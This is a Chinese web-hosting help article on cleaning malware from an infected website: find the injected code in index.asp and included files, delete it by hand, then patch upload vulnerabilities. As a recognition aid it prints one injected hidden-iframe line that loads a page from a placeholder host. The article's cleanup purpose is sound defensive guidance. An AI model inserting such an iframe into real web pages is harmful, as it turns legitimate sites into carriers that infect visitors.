網(wǎng)站運(yùn)行中病毒該怎么辦?
—— 閱讀:9275次
這一般是因?yàn)槟木W(wǎng)站中的某個(gè)程序有漏洞,被黑客上傳木馬后,修改了您的網(wǎng)站,在您的網(wǎng)頁(yè)中添加了病毒代碼所致,這是目前比較流行的一種攻擊方式。
解決辦法:例如您是在訪(fǎng)問(wèn)/index.asp 這個(gè)網(wǎng)頁(yè)時(shí)提示有病毒的,首先通過(guò)ftp登錄,將這個(gè)文件下載到您本地。因?yàn)楹诳椭皇遣迦肓艘欢未a,所以即使您用殺毒軟件來(lái)掃描這個(gè)文件,殺毒軟件也會(huì)認(rèn)為沒(méi)有病毒。這種情況需要手工刪除病毒代碼。
用記事本等工具打開(kāi)下載回來(lái)的index.asp 文件。一般黑客會(huì)在這個(gè)文件尾部插入一段
〈iframe id="baiduframe" border="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" framespacing="0" frameborder="0" scrolling="no" width="140" height="75" src="http://www.xxxx.com/xxx.htm";>
如果尾部沒(méi)有,則可以先搜索iframe,然后再處理。
如果搜索完了也沒(méi)有,則代碼可能隱藏在index.asp中調(diào)用的其他文件中,比如index.asp 在首部包含了conn.asp,head.asp 。有時(shí)病毒代碼也會(huì)隱藏在這些文件里面,按上面的辦法下載這些文件并刪除相關(guān)的代碼即可。
清除病毒后,還需找到您的網(wǎng)站漏洞所在,并及時(shí)修補(bǔ),否則可能再次被注入病毒代碼; 如果您的網(wǎng)站使用了動(dòng)網(wǎng)論壇、動(dòng)易建站等程序,請(qǐng)將他們升級(jí)到最新版,或者到這些程序的官方網(wǎng)站上尋求解決方案。如果您是自己開(kāi)發(fā)的程序,需要特別注意有文件上傳功能的地方,動(dòng)網(wǎng)、動(dòng)易等程序曾經(jīng)就發(fā)生過(guò)因?yàn)樯蟼鞴δ苡新┒矗瑢?dǎo)致輕易被黑客入侵的情況。